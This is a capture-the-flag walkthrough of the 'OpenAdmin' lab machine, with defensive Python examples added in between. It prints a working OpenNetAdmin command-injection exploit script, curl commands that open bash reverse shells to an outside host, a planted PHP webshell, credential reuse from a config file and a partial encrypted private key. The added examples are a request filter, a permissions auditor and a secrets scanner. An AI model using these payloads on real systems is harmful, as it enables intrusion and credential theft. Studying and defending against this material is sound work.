OpenAdmin

Linux · Easy

10.10.10.171

Reconnaissance:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.171 

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 3.16 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 5.1 (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Android 4.1.1 (93%), Linux 3.18 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.10 seconds
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.171

All 1000 scanned ports on 10.10.10.171 are in ignored states.
Not shown: 1000 closed udp ports (port-unreach)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: remote management|phone|general purpose|webcam|storage-misc
Running: Avocent embedded, Google Android 2.X, Linux 2.6.X, AXIS embedded, ZyXEL embedded
OS CPE: cpe:/o:google:android:2.2 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.17 cpe:/h:axis:210a_network_camera cpe:/h:axis:211_network_camera cpe:/h:zyxel:nsa-210
OS details: Avocent/Cyclades ACS 6000, Android 2.2 (Linux 2.6), Linux 2.6.14 - 2.6.34, Linux 2.6.17, Linux 2.6.17 (Mandriva), Linux 2.6.32, AXIS 210A or 211 Network Camera (Linux 2.6.17), ZyXEL NSA-210 NAS device
Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1013.87 seconds
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.171

The scans show two open TCP ports, SSH on 22 and HTTP on 80, and no open UDP ports.

ENUM: Website - TCP 80

The site is just the default Apache page (http://10.10.10.171/), whose footer reads "Apache/2.4.29 (Ubuntu) Server at 10.10.10.171 Port 80".

Font scripts
- Font Awesome
- Google Font API
Miscellaneous
- Popper
Web servers
- Apache HTTP Server 2.4.29
Operating systems
- Ubuntu
JavaScript libraries
- Isotope
- AOS
- OWL Carousel
- jQuery Migrate3.0.0
- jQuery 3.3.1
- FancyBox 3.5.6
UI frameworks
- Bootstrap 4.3.1
┌──(kali💀kali)-[~]
└─$ whatweb -a3 http://10.10.10.171/ -v
WhatWeb report for http://10.10.10.171/
Status    : 200 OK
Title     : Apache2 Ubuntu Default Page: It works
IP        : 10.10.10.171
Country   : RESERVED, ZZ

Summary   : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.29 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : Apache/2.4.29 (Ubuntu) (from server string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Tue, 30 Jan 2024 01:38:52 GMT
        Server: Apache/2.4.29 (Ubuntu)
        Last-Modified: Thu, 21 Nov 2019 14:08:45 GMT
        ETag: "2aa6-597dbd5dcea8b-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 3138
        Connection: close
        Content-Type: text/html
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.171

+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 597dbd5dcea8b, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8047 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2024-01-29 21:36:08 (GMT-5) (3392 seconds)
┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

/.php                 (Status: 403) [Size: 277]
/music                (Status: 301) [Size: 312] [--> http://10.10.10.171/music/]
/artwork              (Status: 301) [Size: 314] [--> http://10.10.10.171/artwork/]
/sierra               (Status: 301) [Size: 313] [--> http://10.10.10.171/sierra/]
/server-status        (Status: 403) [Size: 277]

/music: The page is for a music site:

http://10.10.10.171/music/index.html
http://10.10.10.171/music/blog.html
http://10.10.10.171/music/category.html
http://10.10.10.171/music/contact.html
Main Road , No 25/11
+34 556788 3221
contact@solmusic.com
┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts  
10.10.10.171	solmusic.com
10.10.10.171	openadmin.htb 
http://solmusic.com/music/index.html
http://openadmin.htb/
http://10.10.10.171/sierra/

http://solmusic.com/artwork/
http://solmusic.com/artwork/index.html
http://solmusic.com/artwork/contact.html
Address: 34 Street Name, City Name Here, United States
Phone: +1 242 4942 290
Email: info@yourdomain.com

/ona: Most of the links point back to index.html or to a couple of other pages on the site. The one that really matters is the Login link at the top: it points to http://10.10.10.171/ona, which doesn’t make a whole lot of sense for a music site.

This is an instance of OpenNetAdmin: http://solmusic.com/ona/

The page shows version 18.1.1 and warns that this is not the latest release.

FOOTHOLD: Shell as www-data

Exploit POC: Searchsploit shows a remote code execution vulnerability in this version:

┌──(kali💀kali)-[~]
└─$ searchsploit OpenNetAdmin

OpenNetAdmin 13.03.01 - Remote Code Execution                           | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)            | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                             | php/webapps/47691.sh
┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 47691.sh 
  Exploit: OpenNetAdmin 18.1.1 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47691
     Path: /usr/share/exploitdb/exploits/php/webapps/47691.sh
    Codes: N/A
 Verified: False
File Type: ASCII text
Copied to: /home/kali/Desktop/47691.sh

There’s a link to this exploit on exploit-db.com. It’s super simple. The script runs an infinite bash loop taking commands and printing the output:

#!/bin/bash
# Exploit-DB 47691: read a command per loop iteration, send it to the
# vulnerable xajax endpoint wrapped in echo "BEGIN"/echo "END" markers, and
# print back only the lines between those markers.

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

I can test it out with just curl. One lesson I learned is that the trailing / at the end of the URL matters:

I can see the output of id at the end of the Module Output section. The exploit from the site just adds an echo before and after the command the user runs and then uses sed to cut out the command output and ignore the rest. I could do this myself, but I’ll just get a reverse shell and leave that as an exercise for the motivated reader.

Shell: Since I want a legit shell, I’ll use curl to push a bash reverse shell:

┌──(kali💀kali)-[~/Desktop]
└─$ curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.16.6/443 0>%261'&xajaxargs[]=ping"  http://10.10.10.171/ona/

It hangs, but in my nc listener, I’ve got a shell:

┌──(kali💀kali)-[~]
└─$ nc -lnvp 443

www-data@openadmin:/opt/ona/www$ whoami
www-data

www-data@openadmin:/opt/ona/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@openadmin:/opt/ona/www$ sudo -l
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: error initializing audit plugin sudoers_audit
www-data@openadmin:/opt/ona/www$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
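Before moving on, the detection side of what just happened. Both curl payloads above (the echo "BEGIN"/"END" probe from 47691.sh and the bash reverse shell) work by smuggling a ; into the xajaxargs[] value that the tooltips module hands to ping, so a request filter in front of /ona/ can catch them by inspecting that parameter. The following Python is an added example, not part of this write-up or of OpenNetAdmin: the parameter names come from the payloads above, the sample bodies are constructed to mirror them, and the metacharacter list is an assumption about what a legitimate IP lookup never needs.

```python
# Added example (not from this write-up or from OpenNetAdmin): flag POST bodies
# whose xajaxargs[] values carry shell metacharacters. Parameter names come from
# the payloads above; everything else is an assumption for the example.
import re
from urllib.parse import unquote_plus

# Tokens a legitimate IP/hostname argument to the tooltips ping module never
# needs, but that a command-chaining payload relies on (assumption).
SHELL_METACHARS = re.compile(r"[;&|`]|\$\(|/dev/tcp/|\bbash\s+-i\b")

# The ONA xajax parameter that carries module arguments (from the payloads above).
WATCHED_PARAMS = ("xajaxargs[]",)


def parse_form_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body into name -> [values].

    Done by hand rather than with urllib.parse.parse_qs so that ';' is never
    treated as a pair separator: the injection depends on ';' surviving
    inside a single value, and that is exactly what we want to look at."""
    params: dict = {}
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(raw))
    return params


def suspicious_values(body: str) -> list:
    """Return every watched parameter value that contains shell metacharacters."""
    params = parse_form_body(body)
    return [v for name in WATCHED_PARAMS for v in params.get(name, [])
            if SHELL_METACHARS.search(v)]


def classify(body: str) -> str:
    """Decision a request filter would make for this body: 'block' or 'allow'."""
    return "block" if suspicious_values(body) else "allow"


# Constructed samples: the two payload shapes used above and a benign lookup.
SAMPLE_BODIES = {
    "id_probe": (
        "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
        '&xajaxargs[]=ip%3D%3E;echo "BEGIN";id;echo "END"&xajaxargs[]=ping'
    ),
    "reverse_shell": (
        "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
        "&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.16.6/443 0>%261'&xajaxargs[]=ping"
    ),
    "benign": (
        "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
        "&xajaxargs[]=ip%3D%3E10.10.10.1&xajaxargs[]=ping"
    ),
}

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(f"{label:13s} {classify(body)}  {suspicious_values(body)}")
```

A filter like this is a stopgap in front of an unpatched 18.1.1 instance; the real fix is the upstream patch, since the root cause is the module passing user input to a shell without validating it as an IP address. Note that Apache's default access log never records POST bodies, so without a body-inspecting proxy or mod_security the only server-side trace of these requests is the www-data user spawning shells.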

Priv Esc: www-data –> jimmy

Enumeration: On the box, I can see two user home directories, but I can’t read into either of them as www-data:

www-data@openadmin://$ cd /home
www-data@openadmin:/home$ ls
jimmy
joanna
www-data@openadmin:/home$ find .
.
./jimmy
find: './jimmy': Permission denied
./joanna
find: './joanna': Permission denied

Heading back to /var/www, there are three directories:

www-data@openadmin:/home$ cd /var/www
www-data@openadmin:/var/www$ ls
html
internal
ona

html has the various sites:

www-data@openadmin:/var/www/html$ ls
artwork
index.html
marga
music
ona
sierra

I hadn’t found the marga one, but it looks like the rest of the dummy sites. internal is owned by jimmy with group internal, and I can’t access it as www-data:

www-data@openadmin:/var/www$ ls -la
total 16
drwxr-xr-x  4 root     root     4096 Nov 22  2019 .
drwxr-xr-x 14 root     root     4096 Nov 21  2019 ..
drwxr-xr-x  6 www-data www-data 4096 Nov 22  2019 html
drwxrwx---  2 jimmy    internal 4096 Nov 23  2019 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21  2019 ona -> /opt/ona/www

www-data@openadmin:/var/www$ cd internal/
bash: cd: internal/: Permission denied

Both ona and html/ona are symlinks to /opt/ona/www.

ONA DB: Since OpenNetAdmin was the only site I found that seemed like it would need a database connection, I went looking there. Reading its config files, I eventually found the database credentials in /var/www/html/ona/local/config/database_settings.inc.php:
www-data@openadmin:/var/www$ cd /var/www/html/ona/local/config

www-data@openadmin:/var/www/html/ona/local/config$ cat database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

I figured I’d check for password reuse, and it worked for jimmy:

www-data@openadmin:/var/www/html/ona$ python3 -c 'import pty; pty.spawn("/bin/bash")'

www-data@openadmin:/var/www/html/ona$ su jimmy
Password: n1nj4W4rri0R!

jimmy@openadmin:/opt/ona/www$ whoami
jimmy

jimmy@openadmin:/opt/ona/www$ id
uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)

No user.txt in jimmy’s home directory. I suspect I need to pivot to joanna.

Priv Esc: jimmy –> joanna

Enumeration:

As jimmy, I can now access /var/www/internal:

jimmy@openadmin:/var/www/internal$ ls -l
total 24
-rw-rw-r-- 1 jimmy jimmy     341 Jan 17 21:15 headers
-rwxrwxr-x 1 jimmy jimmy    3229 Jan 17 19:44 index_backup.php
-rwxrwxr-x 1 jimmy internal 3094 Jan 17 21:12 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy jimmy     339 Jan 17 20:13 main_backup.php
-rwxrwxr-x 1 jimmy internal  339 Jan 17 20:39 main.php

I can do some digging to see if this site is running, and how it’s hosted (different vhost, or path, or port) by looking at the configs in /etc/apache2/sites-enabled:

jimmy@openadmin:/etc/apache2/sites-enabled$ ls
internal.conf  openadmin.conf

openadmin.conf shows the site I found, listening on port 80, with root at /var/www/html (comment lines removed):

jimmy@openadmin:/etc/apache2/sites-enabled$ cat openadmin.conf 
<VirtualHost *:80>
        ServerName openadmin.htb

        ServerAdmin jimmy@openadmin.htb
        DocumentRoot /var/www/html

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

internal.conf shows a listener on localhost:52846:

jimmy@openadmin:/etc/apache2/sites-enabled$ cat internal.conf 
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

It’s also interesting that, through mpm_itk’s AssignUserID, this vhost runs as joanna.
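That identity is the whole story of the next step: the vhost executes PHP as joanna, but /var/www/internal (drwxrwx--- jimmy internal, in the ls -la earlier) is writable by everyone in group internal, so any member of that group can drop a PHP file that runs as joanna. The audit below is an added example, not from this write-up or from Apache: it parses a vhost snippet and an ls -la listing constructed here from the ones on this page, and the group membership map is taken from the id output shown for jimmy and joanna.

```python
# Added example (not from this write-up or from Apache): check whether anyone
# other than the identity a vhost runs PHP as can write into its DocumentRoot.
import re


def parse_vhost(conf: str) -> dict:
    """Pull DocumentRoot and the mpm_itk AssignUserID pair out of a vhost file.
    Without AssignUserID, Apache on Ubuntu runs as www-data (assumed default)."""
    root = re.search(r"^\s*DocumentRoot\s+(\S+)", conf, re.M)
    ident = re.search(r"^\s*AssignUserID\s+(\S+)\s+(\S+)", conf, re.M)
    return {
        "document_root": root.group(1) if root else None,
        "run_user": ident.group(1) if ident else "www-data",
        "run_group": ident.group(2) if ident else "www-data",
    }


# One 'ls -la' entry: mode, link count, owner, group, size, three date tokens, name.
LS_LINE = re.compile(
    r"^(?P<mode>[dl-][rwxsStT-]{9})\+?\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+\S+\s+(?P<name>.+)$"
)


def parse_ls_la(listing: str) -> dict:
    """Parse 'ls -la' output into name -> {mode, owner, group}."""
    entries = {}
    for line in listing.splitlines():
        m = LS_LINE.match(line)
        if m:
            entries[m.group("name")] = {k: m.group(k) for k in ("mode", "owner", "group")}
    return entries


def foreign_writers(vhost: dict, entry: dict, group_members: dict) -> list:
    """Principals other than root and the vhost's run user that can write to the
    directory. Any such principal can plant PHP that executes as the run user."""
    mode, writers = entry["mode"], set()
    if mode[2] == "w":                      # owner write bit
        writers.add(entry["owner"])
    if mode[5] == "w":                      # group write bit
        writers.update(group_members.get(entry["group"], []))
    if mode[8] == "w":                      # world write bit
        writers.add("<everyone>")
    writers.discard("root")
    writers.discard(vhost["run_user"])
    return sorted(writers)


# Constructed inputs mirroring the vhost and listing on this page.
INTERNAL_CONF = """Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
</VirtualHost>
"""
VAR_WWW_LISTING = """total 16
drwxr-xr-x  4 root     root     4096 Nov 22  2019 .
drwxr-xr-x  6 www-data www-data 4096 Nov 22  2019 html
drwxrwx---  2 jimmy    internal 4096 Nov 23  2019 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21  2019 ona -> /opt/ona/www
"""
# From the id output on this page: both users are members of group internal.
GROUP_MEMBERS = {"internal": ["jimmy", "joanna"], "jimmy": ["jimmy"], "joanna": ["joanna"]}


def audit_internal_vhost() -> list:
    """Who, besides joanna and root, can write into the internal vhost's root."""
    vhost = parse_vhost(INTERNAL_CONF)
    entry = parse_ls_la(VAR_WWW_LISTING)[vhost["document_root"].rsplit("/", 1)[-1]]
    return foreign_writers(vhost, entry, GROUP_MEMBERS)


if __name__ == "__main__":
    print("can write into the joanna vhost's DocumentRoot:", audit_internal_vhost())
```

The finding is jimmy: the group write bit on a DocumentRoot served under a different user turns group membership into code execution as that user. The fix is to make the DocumentRoot read-only for everyone except the account that deploys it (and never the account that serves it, either).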

Internal Site: I’ll reconnect as jimmy over SSH with a tunnel so that I can reach the internal site:

┌──(kali💀kali)-[~]
└─$ ssh jimmy@10.10.10.171 -L 52846:localhost:52846
n1nj4W4rri0R!

Now I can visit http://127.0.0.1:52846/ through the tunnel and get the internal site’s login page.

Path 1: Webshell

The initial way I solved this was to write a webshell into the DocumentRoot of this vhost, which group internal can write to:

jimmy@openadmin:~$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ ls
index.php  logout.php  main.php
jimmy@openadmin:/var/www/internal$ echo '<?php system($_GET["cmd"]); ?>' > exodus.php

Now I can access that and get execution as joanna:

┌──(kali💀kali)-[~]
└─$ curl http://127.0.0.1:52846/exodus.php?cmd=id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

To get a shell, I can start nc and curl:

┌──(kali💀kali)-[~]
└─$ curl 'http://127.0.0.1:52846/exodus.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.16.6/443%200%3E%261%27'
┌──(kali💀kali)-[~]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.171] 53234

joanna@openadmin:/var/www/internal$ whoami
joanna

joanna@openadmin:/var/www/internal$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

joanna@openadmin:/var/www/internal$ ls
exodus.php
index.php
logout.php
main.php

joanna@openadmin:/var/www/internal$ cd ~
joanna@openadmin:/home/joanna$ ls 
user.txt

joanna@openadmin:/home/joanna$ cat user.txt
2d9e3e---------------------------

Path 2: Log In and SSH

Log In and Get Key: The site above requires a username and password. Checking index.php, I can see the username and the SHA-512 hash of the password hardcoded in the PHP source:

      <h2>Enter Username and Password</h2>
      <div class = "container form-signin">
        <h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
          <?php
            $msg = '';

            if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $_SESSION['username'] = 'jimmy';
                  header("Location: /main.php");
              } else {
                  $msg = 'Wrong username or password.';
              }
            }
         ?>
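Both secrets on this path were sitting in PHP source that another account could read: the DB password in database_settings.inc.php (reused for jimmy) and the SHA-512 digest hardcoded in index.php, unsalted and compared with PHP’s loose ==. The scanner below is an added example, not from this write-up or from OpenNetAdmin; its regexes are assumptions tuned to exactly these two patterns, and the sample files are constructed stand-ins for the two on this page with a placeholder password and digest.

```python
# Added example (not from this write-up or from OpenNetAdmin): scan PHP source
# for the two secret-in-code patterns seen on this box. Regexes are assumptions
# tuned to those patterns; the sample files are constructed stand-ins.
import re

DB_PASSWORD = re.compile(r"'db_passwd'\s*=>\s*'([^']+)'")
HARDCODED_DIGEST = re.compile(
    r"hash\(\s*'(?P<algo>md5|sha1|sha256|sha512)'\s*,\s*\$_POST\[[^\]]+\]\s*\)"
    r"\s*(?P<op>={2,3})\s*'(?P<digest>[0-9a-fA-F]{32,128})'"
)


def scan_php(source: str, path: str = "<constructed>") -> list:
    """Return findings as dicts; the secret value itself is never copied out."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if DB_PASSWORD.search(line):
            findings.append({
                "path": path, "line": lineno, "kind": "db-password-in-source",
                "fix": "move credentials outside the DocumentRoot and restrict read access",
            })
        m = HARDCODED_DIGEST.search(line)
        if m:
            findings.append({
                "path": path, "line": lineno, "kind": "hardcoded-password-digest",
                "algorithm": m.group("algo"),
                "loose_compare": m.group("op") == "==",
                "fix": "store a password_hash() value outside the source and check it with password_verify()",
            })
    return findings


# Constructed stand-in for database_settings.inc.php (placeholder password).
SAMPLE_DB_CONFIG = """<?php
$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'placeholder-db-password',
        'db_database' => 'ona_default',
      ),
    ),
  ),
);
"""

CONSTRUCTED_DIGEST = "0123456789abcdef" * 8   # 128 hex chars, not a real hash

# Constructed stand-in for the login check in index.php.
SAMPLE_LOGIN = """<?php
$msg = '';
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
  if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '__DIGEST__') {
    $_SESSION['username'] = 'jimmy';
  }
}
""".replace("__DIGEST__", CONSTRUCTED_DIGEST)

# What the same check looks like once the digest lives outside the source:
# password_verify() is salted, slow and constant-time.
HARDENED_LOGIN = """<?php
$stored_hash = getenv('INTERNAL_LOGIN_HASH');
if (isset($_POST['login']) && password_verify($_POST['password'], $stored_hash)) {
  $_SESSION['username'] = 'jimmy';
}
"""


def scan_all() -> dict:
    """Scan the three constructed files and return findings keyed by file name."""
    return {name: scan_php(src, name) for name, src in [
        ("database_settings.inc.php", SAMPLE_DB_CONFIG),
        ("index.php", SAMPLE_LOGIN),
        ("index_hardened.php", HARDENED_LOGIN),
    ]}


if __name__ == "__main__":
    for name, findings in scan_all().items():
        for f in findings:
            print(f"{f['path']}:{f['line']} {f['kind']} -> {f['fix']}")
```

The loose-compare flag matters on its own: a plain == between two strings that both look like scientific notation (a digest starting 0e followed only by digits) is true in PHP, which is why hash comparisons belong in hash_equals() or password_verify() even when the digest is stored properly.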

Logging in redirects to http://127.0.0.1:52846/main.php, which displays an encrypted RSA private key:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
